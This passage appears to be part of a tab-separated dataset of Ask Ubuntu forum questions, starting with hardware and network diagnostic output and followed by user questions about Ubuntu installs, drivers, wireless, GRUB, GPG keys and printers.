( rev 01 ) subsystem : hewlett-packard company bcm4312 802.11b/g wireless lan controller [ 103c:137d ] control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 18 region 0 : memory at 59700000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 40 ] power management version 3 flags : pmeclk- dsi- d1+ d2+ auxcurrent=0ma pme ( d0- , d1- , d2- , d3hot- , d3cold- ) status : d0 nosoftrst+ pme-enable- dsel=0 dscale=2 pme- capabilities : [ 58 ] vendor specific information : len=78 < ? > capabilities : [ e8 ] msi : enable- count=1/1 maskable- 64bit+ address : 0000000000000000 data : 0000 capabilities : [ d0 ] express ( v1 ) endpoint , msi 00 devcap : maxpayload 128 bytes , phantfunc 0 , latency l0s < 4us , l1 unlimited exttag+ attnbtn- attnind- pwrind- rbe+ flreset- devctl : report errors : correctable- non-fatal- fatal- unsupported- rlxdord- exttag- phantfunc- auxpwr- nosnoop- maxpayload 128 bytes , maxreadreq 128 bytes devsta : correrr- uncorrerr- fatalerr- unsuppreq- auxpwr- transpend- lnkcap : port # 0 , speed 2.5gt/s , width x1 , aspm l0s l1 , exit latency l0s < 4us , l1 < 64us clockpm- surprise- llactrep- bwnot- lnkctl : aspm disabled ; rcb 64 bytes disabled- commclk+ extsynch- clockpm- autwiddis- bwint- autbwint- lnksta : speed 2.5gt/s , width x1 , trerr- train- slotclk+ dlactive- bwmgmt- abwmgmt- capabilities : [ 100 v1 ] advanced error reporting uesta : dlp- sdes- tlp- fcp- cmpltto- cmpltabrt- unxcmplt- rxof- malftlp- ecrc- unsupreq+ acsviol- uemsk : dlp- sdes- tlp- fcp- cmpltto- cmpltabrt- unxcmplt- rxof- malftlp- ecrc- unsupreq- acsviol- uesvrt : dlp+ sdes- tlp- fcp+ cmpltto- cmpltabrt- unxcmplt- rxof+ malftlp+ ecrc- unsupreq- acsviol- cesta : rxerr+ badtlp+ baddllp+ rollover- timeout+ nonfatalerr+ cemsk : rxerr- badtlp- baddllp- rollover- timeout- nonfatalerr+ aercap : first error pointer : 00 , gencap+ cgenen- chkcap+ chken- capabilities : [ 13c v1 ] virtual channel caps : lpevc=0 refclk=100ns patentrybits=1 arb : fixed- wrr32- wrr64- wrr128- ctrl : arbselect=fixed status : inprogress- vc0 : caps : patoffset=00 maxtimeslots=1 rejsnooptrans- arb : fixed- wrr32- wrr64- wrr128- twrr128- wrr256- ctrl : enable+ id=0 arbselect=fixed tc/vc=ff status : negopending- inprogress- capabilities : [ 160 v1 ] device serial number 51-c1-00-ff-ff-63-00-21 capabilities : [ 16c v1 ] power budgeting < ? > kernel driver in use : b43-pci-bridge 04:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 02 ) subsystem : hewlett-packard company device [ 103c:30f7 ] control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 19 region 0 : i/o ports at 3000 [ size=256 ] region 2 : memory at 53410000 ( 64-bit , prefetchable ) [ size=4k ] region 4 : memory at 53400000 ( 64-bit , prefetchable ) [ size=64k ] expansion rom at 53420000 [ disabled ] [ size=128k ] capabilities : [ 40 ] power management version 3 flags : pmeclk- dsi- d1+ d2+ auxcurrent=375ma pme ( d0+ , d1+ , d2+ , d3hot+ , d3cold+ ) status : d0 nosoftrst+ pme-enable- dsel=0 dscale=0 pme- capabilities : [ 50 ] msi : enable- count=1/1 maskable- 64bit+ address : 0000000000000000 data : 0000 capabilities : [ 70 ] express ( v2 ) endpoint , msi 01 devcap : maxpayload 256 bytes , phantfunc 0 , latency l0s < 512ns , l1 < 64us exttag- attnbtn- attnind- pwrind- rbe+ flreset- devctl : report errors : correctable- non-fatal- fatal- unsupported- rlxdord+ exttag- phantfunc- auxpwr- nosnoop- maxpayload 128 bytes , maxreadreq 4096 bytes devsta : correrr+ uncorrerr+ fatalerr- unsuppreq+ auxpwr+ transpend- lnkcap : port # 0 , speed 2.5gt/s , width x1 , aspm l0s l1 , exit latency l0s < 512ns , l1 < 64us clockpm+ surprise- llactrep- bwnot- lnkctl : aspm l0s l1 enabled ; rcb 64 bytes disabled- commclk+ extsynch- clockpm+ autwiddis- bwint- autbwint- lnksta : speed 2.5gt/s , width x1 , trerr- train- slotclk+ dlactive- bwmgmt- abwmgmt- devcap2 : completion timeout : not supported , timeoutdis+ , ltr- , obff not supported devctl2 : completion timeout : 50us to 50ms , timeoutdis- , ltr- , obff disabled lnkctl2 : target link speed : 2.5gt/s , entercompliance- speeddis- transmit margin : normal operating range , entermodifiedcompliance- compliancesos- compliance de-emphasis : -6db lnksta2 : current de-emphasis level : -6db , equalizationcomplete- , equalizationphase1- equalizationphase2- , equalizationphase3- , linkequalizationrequest- capabilities : [ ac ] msi-x : enable- count=2 masked- vector table : bar=4 offset=00000000 pba : bar=4 offset=00000800 capabilities : [ cc ] vital product data unknown small resource type 00 , will not decode more . capabilities : [ 100 v1 ] advanced error reporting uesta : dlp- sdes- tlp- fcp- cmpltto+ cmpltabrt- unxcmplt- rxof- malftlp- ecrc- unsupreq- acsviol- uemsk : dlp- sdes- tlp- fcp- cmpltto- cmpltabrt- unxcmplt- rxof- malftlp- ecrc- unsupreq- acsviol- uesvrt : dlp+ sdes+ tlp- fcp+ cmpltto- cmpltabrt- unxcmplt- rxof+ malftlp+ ecrc- unsupreq- acsviol- cesta : rxerr+ badtlp+ baddllp- rollover+ timeout+ nonfatalerr+ cemsk : rxerr- badtlp- baddllp- rollover- timeout- nonfatalerr+ aercap : first error pointer : 0e , gencap+ cgenen- chkcap+ chken- capabilities : [ 140 v1 ] virtual channel caps : lpevc=0 refclk=100ns patentrybits=1 arb : fixed- wrr32- wrr64- wrr128- ctrl : arbselect=fixed status : inprogress- vc0 : caps : patoffset=00 maxtimeslots=1 rejsnooptrans- arb : fixed- wrr32- wrr64- wrr128- twrr128- wrr256- ctrl : enable+ id=0 arbselect=fixed tc/vc=01 status : negopending- inprogress- capabilities : [ 160 v1 ] device serial number 6d-01-00-00-ff-ff-00-00 kernel driver in use : r8169 `shailesh @ shailesh-compaq-presario-cq40-notebook-pc : ~ $ **iwconfig** lo no wireless extensions . eth0 no wireless extensions . shailesh @ shailesh-compaq-presario-cq40-notebook-pc : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:1e : ec : b5:84:9d up broadcast multicast mtu:1492 metric:1 rx packets:291 errors:0 dropped:0 overruns:0 frame:0 tx packets:253 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:75116 ( 75.1 kb ) tx bytes:35130 ( 35.1 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1240 errors:0 dropped:0 overruns:0 frame:0 tx packets:1240 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:112252 ( 112.2 kb ) tx bytes:112252 ( 112.2 kb )
523513	14.04 on powerbook g4	tried upgrading to ubuntu 14.04 on my mac powerbook g4 and the upgrade said my graphics card was too old and not recomened upgrade . anyideas besides older distros which i use already ?
523514	ubuntu 14.04 and android 4.4.4 usb	i run on 14.04 and got a brand new xperia z1 compact on kitkat 4.4.4 . when i connect the phone via usb normally the internal storage got mounted , but nothing happens . i have read that i should try msc instead of mtp , but no changes . as it seems , there is an issue with the combination of 14.04 and kitkat . does anyone have a workaround ? greetings tobias
523515	ubuntu did n't restart after using testdisk	i recently switched to ubuntu 14.04 from windows 8 . i mistakenly choose remove windows 8 and install ubuntu . by doing this all my windows drive was wiped out . then i searched for data recovery and found `` testdisk '' . i restored the main files i want then i press write . then after that i restarted the ubuntu . after i restart it shows me grub resue > screen and ubuntu didnt worked at all . then i tried restoring/repairing the grub according to https : //help.ubuntu.com/community/boot-repair . it shows me the operation was successful but i get black screen while reboot . below is the detail http : //paste.ubuntu.com/8333520/ please help me on this . i do not want to lose any data recovered from testdisk . also if possible can anybody give quick solution . i need asap help .
523517	ca n't login with username and password	i have just installed wubi ubuntu 12.04 and chose a username and password during the installation as requsted . when i load up ubuntu i ca n't login with my username and password , i have to use a guest login . i have entered the correct username and password and have even tried re-installing ubuntu , but i still get the same problem . any help will be much appreciaciated .
523518	recover data from crashed mac hard-drive from ubuntu live cd	i 've seen this question already posted but it did n't work for me . i have and old imac from mid 2007 ( imac 7,1 if i 'm not wrong ) . i made a backup of my iphone on itunes and then i made a complete restore of my iphone . everything was going well until , just before restoring my backup the imac froze . so now , everytime i start the imac i get that spinning wheel and nothing more . i 'm able to use an ubuntu live cd and see all the files on the imac partition . i just want to copy this iphone backup , i do n't care about the other data but i 'm not able to copy due to the imac permissions . i know the problem is the hard-drive but i ca n't repair it . is there a easy way/command thru terminal to do this ? i would appreciate any kind of help . thanks a lot . updates : if i type mount : /cow on / type overlayfs ( rw ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) /dev/sr0 on /cdrom type iso9660 ( ro , noatime ) /dev/loop0 on /rofs type squashfs ( ro , noatime ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) none on /sys/firmware/efi/efivars type efivarfs ( rw ) tmpfs on /tmp type tmpfs ( rw , nosuid , nodev ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) gvfs-fuse-daemon on /home/ubuntu/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=ubuntu ) /dev/sda1 on /media/imac type hfsplus ( ro , nosuid , nodev , uhelper=udisks ) if i type df -h : filesystem size used avail use % mounted on /cow 2.0g 83m 1.9g 5 % / udev 2.0g 4.0k 2.0g 1 % /dev tmpfs 395m 864k 395m 1 % /run /dev/sr0 758m 758m 0 100 % /cdrom /dev/loop0 713m 713m 0 100 % /rofs tmpfs 2.0g 16k 2.0g 1 % /tmp none 5.0m 4.0k 5.0m 1 % /run/lock none 2.0g 76k 2.0g 1 % /run/shm /dev/sda1 238g 164g 74g 70 % /media/imac using copy & paste : error while copying `` folder name '' . there was an error copying the file into /media/usbstick . error opening file : permission denied using command cp with root privileges : sudo su cp -r /media/imac/users/user/library/ ... /* /media/usbstick errors : cp : failed to extend ... . input/output error
523519	dual -boot on cmdlet not supported on this platform	i have question . on my windows powershell i got cmdlet not supported on this platform , can i still get dualboot on my device ? help
523520	installing ubuntu 14 using usb on windows 7	i have followed the guide on the website to create a boot able usb and start the installation and evrey time i choose to install inside windows the continue button changes to `` restart to continue '' and the computer restart and start the setup and restart
523521	facing issue in installing ubuntu 12.04.2	i tried to install ubuntu 12.04.2 on my laptop . i performed following actions with the system- ( 1 ) i wanted to replace windows 7 by ubuntu . so started installation with `` try ubuntu '' option . while trying out i deleted all my partitions ( including c ) ( 2 ) next i started installation , chose ubuntu to install on whole 500 gb hard disk . now the installation goes smooth till end . but while restarting , it takes me to `` boot menu '' . and there whatever i do , it comes back to `` boot menu '' prompt automatically . meanwhile i observed that my dvd drive can read only cd ( not sure if its a result of what i did , or its completely different issue ) please guide me to resolve this installation issue .
523522	ubuntu failing to install on seperate hdd , blank screen , flashing cursor	i have downloaded ubuntu 14.04.1 desktop iso and burned it to a bootable cd and have made a bootable usb drive using both universal usb installer and unetbootin . i have tried mutliple ways to attempt the install . let me explain my current setup . i am running windows 8.1 on an ssd as my main os . and a couple of drives with data associated with windows . ( mostly 3 tb hdd 's ) i have another seperate 3tb hdd completely empty ( formatted ntfs at the moment ) . this is where i want to install ubuntu at , on its own hard drive . i am having a lot of trouble . i managed to get to an ubuntu main menu only when using the iso boot cd for some reason ( usb method only takes me to the grub 2 menu and after i select the install ubuntu option i get a blank screen with a blinking text cursor ) when i use the cd method the results end up the same , i selected `` install ubuntu '' and the keyboard flashes and i am brought to a blank screen with a flashing text cursor . i have even removed all of my extra drives , including the windows drive , leaving only the empty drive in and tried multiple boot procedures , but it does not want to continue the installation , just black and a white blinking cursor . my system specs are the following : os : windows 8.1 64-bit cpu : intel core i7 2600k mobo : asustek p8z68-v pro ram : 16gb ddr3 corsair gpu : nvidia geforce gtx 680 my main concern is this ... is there a simple way to install ubuntu on it 's own hard drive and be able to boot either windows 8.1 ( on it 's own drive as well ) or ubuntu upon start up ? ? thanks .
523525	no icon images in unity dash for applications	i 'm not sure how you would call it , but i do not have any images showing on the search bar . with that i mean the search thing with the ubuntu logo ( sorry for not knowing the name , i just installed ubuntu ) . with that i mean this : is this normal behaviour , as i would expect images or information to show there.. thanks
523527	how to install lan card driver of tp link tf-3200	i have installed ubuntu 14.04 32 bit os but i do n't know how to install wired local area network ( lan ) card driver when i downloaded the driver packages its available for linux but not ubuntu .
523528	why does ubuntu 14.04 not recognize nvidia geforce 310m hardware ?	i 've got a typical problem with my nvidia gpu . i recently installed ubuntu 14.04 over windows 7 and completely whiped everything ( on purpose ) , so i have a clean ubuntu computer . some specs : asus kj52c ram : 4 gb gpu : hybrid nvidia 310m and intel integrated graphics processor : some intel i5 on ubuntu 13 i had the nvidia card up and running with bumblebee , and on windows 7 it worked as a charm . now , it 's not recognized as hardware any more . lspci | grep vga shows : 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) lspci -v shows no hint of nvidia anywhere as such , i ca n't install any drivers for it , nor get bumblebee / nvidia prime running . any ideas would be very much appreciated .
523531	raspbery pi vid config for use in ubuntu	this is another post in the numerous questions of `` how to connect ubuntu to my tv '' . however , previous answers did not cover my scenario . so , to start with , i do not have nvidia / descrete graphics in my laptop ( dell latitude e6220 ) . i have the sandybridge intel chipset . if i connect my laptop to my tv via hdmi ( it is hdmi on laptop to a dvi connector on tv ) , ubuntu fails to detect the screen , despite efforts such as rebooting with tv attached and running xrandr -- query . xrandr simply returns that the hdmi connection is `` disconnected '' . at this point , a fair assumption would be to say the hdmi port on laptop or tv is faulty . not the case . i can connect the laptop to a monitor ( also hdmi -- > dvi ) and a signal is present as expected . i can connect my raspbery pi to the tv and a signal is present as expected , ruling out faults at all connection points . it seems that there is simply something in ubuntu that ca n't handle my tv . so the question is : what can i look at on the pi that i can convert to be suitable information for the dell ? it seems odd that a severely stripped down distro can handle the tv ( it is an old-ish phillips `` flattv '' lcd ) and a full unbuntu install ca n't . out of the box utilitues would be preferable , as the pi is not wifi ( running wheezy ) and my tv has no network connection near by . many thanks
523532	ubuntu 14.04 : ralink rt5372 slow and unstable speed	i have the usb dongle : bus 003 device 004 : id 148f:5372 ralink technology , corp. rt5372 wireless adapter ubuntu is using the default rt2800 default driver . the speed of my rt5372 goes `` up and down '' . this are some extra info of my system wireless . i have tried to compile the original drivers but i got : dpo_rt5572_linuxsta_2.6.1.3_20121022/os/linux/../../os/linux/rt_linux.c:1142:20 : error : incompatible types when assigning to type ‘int’ from type ‘kgid_t’ posfsinfo- > fsgid = current_fsgid ( ) ; and look there is no way to compile it with the new kernel 3.x . any idea how to fix this wireless problem ?
523534	what does update-alternatives do ?	i used the man pages for update-alternatives but i kinda still do n't get it . my question is what does update-alternatives do ? and i would appreciate an example also , thanks !
523544	weird sounds on every keypress , xfce	well , after installing xubuntu ( xfce + ubuntu ) everything 's fine except one strange thing - can not find and mute keypress event . on every key is pressed - i hear a sound . can not find and mute it in multimedia preferences . any ideas on reason ?
523545	how good is ubuntu server os ?	i 'm working on a project and in that i have a server which is supposed to be working all 24hrs and fetches data every 5 minutes from gateways and other servers also it uploads data on cloud server . so everything is managed by java and php code , it has mysql and r studio server version software running on it . so is ubuntu server os a good choice for this purpose ? ? because user friendly and stable server os is our basic need . so please suggest accordingly if any other os is better ? ?
523546	set the google chrome icon back to default	i get `` some webpage 's tag-google chrome '' after i put my cursor upon the google icon of the sidebar . how can i restore the tag back to the default ?
523547	i need help with installing ubuntu 14.04 alongside to windows 8	i bought a new lenovo b350 with windows 8 pre-installed . should i continue with the windows setup and then just download 14.04 from the ubuntu website ? i tried just booting a 14.04 dvd and it did not install . the computer remained on the acceptance of windows window .
523549	how to automatically opening terminal windows & tabs , ssh and sudo su ?	when i start my day in front of my computer , i first have to do the following : in workspace 1 : open a new terminal window , ssh loginserver , then ssh servera1 and sudo su account00 open a new terminal tab , ssh loginserver , then ssh servera2 and sudo su account00 open a new terminal tab , ssh loginserver , then ssh servera3 and sudo su account00 in workspace 2 : open a new terminal window , 1ssh loginserver , then ssh serverb1 and sudo su account00 open a new terminal tab , ssh loginserver , then ssh serverb2 and sudo su account00 open a new terminal tab , ssh loginserver , then ssh serverb3 and sudo su account00 in workspace 3 : etc ... is there a way to automatize the whole process , e.g. , having a script that automatically opens each terminal window in its own workspace , all terminal tabs in each window , and all corresponding ssh / sudo su commands ? if not , which parts can i automatize ?
523553	ubuntu 14.04 re-installation - installing updates from the internet is taking more than 12 hours	i 'm reinstalling ubuntu 14.04 due to my memory ( ram ) was getting full with information , affecting my pc . i had my computer running ubuntu 14.04 . i picked the option to remove the previous ubuntu and reinstall . this time , i allowed it to install all updates through my internet connection . my problem is that i have stood in the notice page for at least 12 hours . should i be worried about something being wrong ? my internet connection has n't been interrupted .
523557	`` error : unknown filesystem '' after install	originally , i tried to install ubuntu 14.04 lts alongside windows , but i came across a problem when rebooting ( unknown file system ) . i tried to simplify problem and installed only ubuntu , wiping out all other partitions , but i still come across the same problem : below is a log from my attempts with grub rescue : error : unknown filesystem entering rescue mode ... grub rescue > ls ( hd0 ) ( hd0 , msdos1 ) ( cd ) grub rescue > set root= ( hd0 , msdos1 ) grub rescue > set prefix= ( hd0 , msdos1 ) /boot/grub grub rescue > insmod normal error : unknown filesystem if i install just windows 7 , it seems to boot without problems , so i assume it 's not down to hardware issue . i do n't know if it 's of any significance , but i 'm using pcie ssd and i do n't have any classical hard drive in my computer . i ran boot-repair , it executed succesfully , it produced the following info : http : //paste.ubuntu.com/8334621/ and asked me to restart the computer . after restarting , i had exactly the same `` error : unknown filesystem '' message . thanks in advance for your help .
523558	transmageddon xvid codec missing	according to the info section of transmageddon in ubuntu software center , xvid is included in the codec options . but when i installed the software , it 's not there . here is a screenshot of transmageddon 's codec options : the question : is there a way to bring the xvid codec back ? and how ? thanks in advance for your help .
523559	acer chromebook 13 cb5-311-t1uu	trying to install linux on my acer chromebook 13 cb5-311-t1uu can you install linux on nvidia tegra k1 quad core cpu processor ?
523560	how to completely delete/uninstall ( k ) ubuntu 14.04	i am pretty new to ubuntu/linux . i love the linux idea and i was looking for distribution i would choose . i chose kubuntu 14.04 , burned .iso on dvd and installed kubuntu without problems . then i was looking inside the os itself and i didnt liked it . i decided to try xubuntu 14.04 instead . i searched if it is possible to switch between them . i tried http : //www.linux.org/threads/converting-between-the-ubuntus.5079/ . but some of commands didnt work for me and it was late so i decided to give up and try it next day . but i couldnt shutdown system , i could work with it but couldnt shut it down . so i decided to shut down computer with its shutdown button . next day when i chose ubuntu in grub it was loading almost for an hour and did nothing . is there any way how can i delete/uninstall/repair/switch to xubuntu from this k/ubuntu if i dont have access to it ? i can acces the root terminal from recovery mode but cant access the os itself . and also i can access 2 recovery modes in grub : newer version ( 3.15 or smth like that ) or older ? thank you for any help .
523562	dual boot ( in ubuntu desktop ) 3g connection	can i use my mobile internet connection in ubuntu desktop side ? and my other question is can i connect my ubuntu phone ( not touch one ) to tv screen ( like samsung smart tv ) via wifi connection or with usb hdmi cable ?
523563	a simple guide to setup a pptp network between a windows and an ubuntu through gui network manager	i 'm trying to setup a vpn connection between my ubuntu computer and my friends ' windows computers for gaming purposes . there are a lot of guides ( such as this ) that describe how to do it in ubuntu but through command line through a program called pptpd . i opened my network manager and saw this : that means that there 's a way to do it without much command line , right ? ... the problem is i 'm very ignorant about networking and especially about vpns . can anyone please explain to me ( or show me a guide for ) how to do it through here ? ... i 'd even be glad if you mention how to do it in windows too but nevermind .
523564	switch user after upgrade to 14.04 not working	i did an upgrade from 13.10 to 14.04 . now the switch user option does not work any more . the logged in user has to log out before any other user can log in . any idea how to fix this ? peter
523566	how can i manually remove a wine program when the uninstaller does n't work ?	installed a windows program to directory z : \ , ca n't delete it using wine uninstaller , ca n't delete it from nautilus . is there a way to override ?
523567	reconfigure audio jack connector	my sound card ( realtek audio ) has the main audio output jack connector broken ... ( the green one ) i noticed that windows can reconfigure the audio line-in ( the blue one ) as audio output for headphones . now i can hear audio again . is it possibile to do the same in ubuntu / linux ? thank you
523570	is there a way to add bleachbit shred to right-click menu ?	bleachbit lets you shred either folders or files if you use the menu from within the program but is it possible to add this option to the menu when you right click on a file or folder that you may want to delete ? i did n't see anything from within bleachbit preferences . it would be great to have this option beside the move to rubbish bin in the menu .
523571	why am i unable to access openpgp keys on seahorse and access encrypted files ?	i am unable to access my openpgp keys on seahorse . i tried to create a new key but the key never appeared ( though it did prompt me for details ) . after trying to create a new keyring none of the keys were showing . i also reinstalled seahorse . when i do gpg -- list-keys all the keys are listed and they also appear in seahorse when i sudo seahorse . however i am unable to access the files through the context menu ( it says i dont have the decryption keys ) . when i attempt to import the keys from /home/ # # # # /.gnupg/pubring.gpg permission is denied . any suggestions on how to access these files ? also i need to transfer some of these locked files onto another ubuntu machine . if i create a new key with the same private key ( i mean the passphrase i normally use to open the files on this machine ) will i be able to open them ? my ~/.gnupg directory : drwx -- -- -- 3 bill bill 4096 sep 13 23:28 . drwxr-xr-x 59 bill bill 4096 sep 13 23:25 .. -rw -- -- -- - 1 bill bill 9398 jul 7 00:14 gpg.conf drwx -- -- -- 2 bill bill 4096 sep 13 22:31 private-keys-v1.d -rw -- -- -- - 1 root root 334311 sep 13 22:17 pubring.gpg -rw -- -- -- - 1 root root 334311 sep 13 22:17 pubring.gpg~ -rw -- -- -- - 1 bill bill 600 sep 13 22:42 random_seed -rw -- -- -- - 1 root root 7645 sep 13 22:17 secring.gpg -rw -- -- -- - 1 bill bill 1520 sep 13 22:17 trustdb.gpg
523574	acer 5732z laptop [ ubuntu 14.04 os ] does not suspend , when i close the lid	can anyone help me ? i use acer 5732z laptop with ubuntu 14.04 os , i would like enable suspend option when i close lid . i went to system setting > power > and choose when the lid is closed suspend . but it does not work . thank you for your help .
523575	how to remove the ubuntu studio startup:	i 'm trying to remove the ubuntustudio startup screen , as i like the vanilla one better and ubuntustudio 's is very slow . i 've already followed all the steps in this post but i ca n't seem to get it to work ! anybody have any ideas ? i 'm pretty stuck . running ubuntu 14.04lts on a custom built computer with an amdfx4300 and a nvidia geforce8400gs .
523576	crouton , chromebook hp 14 , ubuntu 12.04 and a usb printer possible ?	i just installed ubuntu 12.04 on my wife 's hp 14 chromebook via crouton method . the main reason was libre office , which she likes a lot more than the `` microsoft word online '' option in chrome os . anyways , i have everything working , but was curious if there is a way to hook up her hp printer and have it recognized via usb by the ubuntu interface . her printer is not wifi or cloud enabled . it 's simply usb . otherwise it 's a perfectly good working printer . will installing common unix printing system make this work for me ? on blind faith , i plugged in the printer to the chromebook running ubuntu environment , but when i clicked print , i got the error asking for localhost . because chromebook is only cloudprint , i 'm thinking this is a hardware issue , not software . so that 's why i 'm hesitant to install anything that could be uneccessary . or is it possible wine would be a solution ? also > for reference in installing ubuntu environment on chromebook hp 14 : installubuntuonchromebook edit : here 's a screenshot of what i 'm looking at when opening `` printer '' in hardware settings . and then when i hit the `` connect '' button : and then finally , when i click `` connect '' on second prompt , i get : cups server error : there was an error during the cups operation . `` failed to connect to server ''
523585	anki issues how to make work	hi further to my question ealrier below is the error message i get from my computer when i try to use anki ( 2.0.28 ) today , i have ascertained that it is my computer and not the files for anki which is where the problem lies the anki files were sent to anki site and they said no problems to access and also sent to another person who also managed to open them no problems i am using ubuntu 14.04 trusty tahr i am definitely no computer whizz but just like using ubuntu , , , i managed to install 14.04 following instructions from here and everything works just fine . this is three weeks ago on a new inspiron 17g laptop but now i want to use anki in conjunction with a thai language programme but to do that i really need anki to work any help will be really appreciated regards karl traceback ( most recent call last ) : file `` /usr/share/anki/oldanki/deck.py '' , line 3718 , in deck deck = deckstorage._upgradedeck ( deck , path ) file `` /usr/share/anki/oldanki/deck.py '' , line 4281 , in _upgradedeck deck.updatetagpriorities ( ) file `` /usr/share/anki/oldanki/deck.py '' , line 1177 , in updatetagpriorities tagids ( self.s , parsetags ( s ) ) file `` /usr/share/anki/oldanki/tags.py '' , line 54 , in tagids [ { 'tag ' : t } for t in tags ] ) file `` /usr/share/anki/oldanki/db.py '' , line 118 , in statements return self.execute ( text ( sql ) , data ) file `` /usr/share/anki/oldanki/db.py '' , line 90 , in execute x = self._session.execute ( *a , **ka ) file `` /usr/lib/python2.7/dist-packages/sqlalchemy/orm/session.py '' , line 934 , in execute clause , params or { } ) file `` /usr/lib/python2.7/dist-packages/sqlalchemy/engine/base.py '' , line 662 , in execute params ) file `` /usr/lib/python2.7/dist-packages/sqlalchemy/engine/base.py '' , line 761 , in _execute_clauseelement compiled_sql , distilled_params file `` /usr/lib/python2.7/dist-packages/sqlalchemy/engine/base.py '' , line 828 , in _execute_context none , none ) file `` /usr/lib/python2.7/dist-packages/sqlalchemy/engine/base.py '' , line 1024 , in _handle_dbapi_exception exc_info file `` /usr/lib/python2.7/dist-packages/sqlalchemy/util/compat.py '' , line 196 , in raise_from_cause reraise ( type ( exception ) , exception , tb=exc_tb ) file `` /usr/lib/python2.7/dist-packages/sqlalchemy/engine/base.py '' , line 824 , in _execute_context context = constructor ( dialect , self , conn , *args ) file `` /usr/lib/python2.7/dist-packages/sqlalchemy/engine/default.py '' , line 438 , in _init_compiled grp , m in enumerate ( parameters ) ] file `` /usr/lib/python2.7/dist-packages/sqlalchemy/sql/compiler.py '' , line 367 , in construct_params % bindparam.key ) statementerror : a value is required for bind parameter 'tag ' ( original cause : invalidrequesterror : a value is required for bind parameter 'tag ' ) u'insert or ignore into tags ( tag ) values ( ? ) ' [ { } ]
523586	need guider to install a driver !	i need someone to help me installing this.i wanted to use the wii u pro controller on linux.but seems too complicated for me.also , i 'm not a programmer or etc ... please help ! i really want it !
523587	synaptic package manager question	why does the synaptic package manager display results for applications that have already been removed ?
523589	intel hd 4600 running slow	merhaba , i recently bought a laptop with intel hd 4600 integrated graphics card . i installed ubuntu 14.04 , installed intel drivers using intel graphics installer for linux . my problem is when i am watching a flash video it is slow . when opening dashboard it is also slow as hell . so i researched about the problem . then found this solution below . creating a /etc/x11/xorg.conf and adding the configs below section `` device '' identifier `` card0 '' driver `` intel '' option `` accelmethod '' `` uxa '' # option `` accelmethod '' `` sna '' endsection so problem with this is when i created and used this and reboot . my screen is closed . completely blank . it is like closed and no power . so if i go to recovery mode and select fsck option then abort it with ctrl + c. then it starts unity screen is on and my problems are also gone . i think i need to update grub and/or add some kind of parameters to it . thanks ,
523591	maxreports reached	setting up heimdal-kcm ( 1.6~git20120311.dfsg.1-2ubuntu0.1 ) ... starting heimdal kcm : invoke-rc.d : initscript heimdal-kcm , action `` start '' failed . dpkg : error processing heimdal-kcm ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports has already been reached errors were encountered while processing : heimdal-kcm updating debian packages of system configurations ( dpsyco ) . e : sub-process /usr/bin/dpkg returned an error code ( 1 )
523593	no internet access on ubuntu-ubuntustudio 14.04 or debian 7.6 !	well , here is my story . i have been using ubuntu for 4-5 years now with a one-year break for windows application compatibility reasons . several days ago , i decided to try debian . i had dual boot debian 7.6 and windows 8 . the first time i installed debian i had issues with sound , graphics card drivers and a very slow internet connection via ethernet . i was trying to solve sound and graphics card drivers , so the number of re-installations of debian was greater than 20 , : p ! when i solved those problems i started trying to solve the very slow internet connection . i installed the latest realtek driver r8168 , blacklisted the r8169 module , compiled several kernel versions ( maybe i did not have the right configuration for the network drivers , so it did not work ) and finally started messing up my /etc/network/interfaces , /etc/resolv.conf , etc . during this painful trying time , the number of re-installations was raising without any result . at this point i have to mention that i have a root partition ( / ) and a home partition ( /home ) . somehow something is stored in my /home partition , but this for what i know is a bit strange as all the files i edited were located in the ( / ) . the second thing i need to mention is that my computer is connected to the router of student residencies of my university where i live . the third thing is that in windows on the same computer i have a very fast internet connnection . after that i decided to reinstall ubuntu 14.04 ( trusty tahr ) . during installation i was downloading packages with 200 kbyte/sec ( slow but not dead internet ) . when i booted for the first time , ... no internet . what is going on ? is this due to my /home partition or the network and the router of my building ? ( i will be able to post any command output , so i can help you giving more information to resolve this issue . )
523596	ubuntu installer 14.04 shuts down while installing	i have a problem that seems to be going unanswered . i downloaded the ubuntu 14.04 64-bit installer and flashed it to a disk . i installed this on a home-built computer with no problems . so i decided to install this on my hp pavilion g6 . whenever it starts installing , the installer disk shuts down the computer . here are the steps to reproduce it : turn on the computer with the disk inserted . let ubuntu start up and select `` install ubuntu '' select `` install ubuntu inside windows 7 '' connect to the internet select `` download updates '' and `` install third-party software '' start install the screen turns purple and says `` please remove disk and press enter to continue '' i do what it says and it restarts the computer . the computer boots up normally into windows 7 with no grub
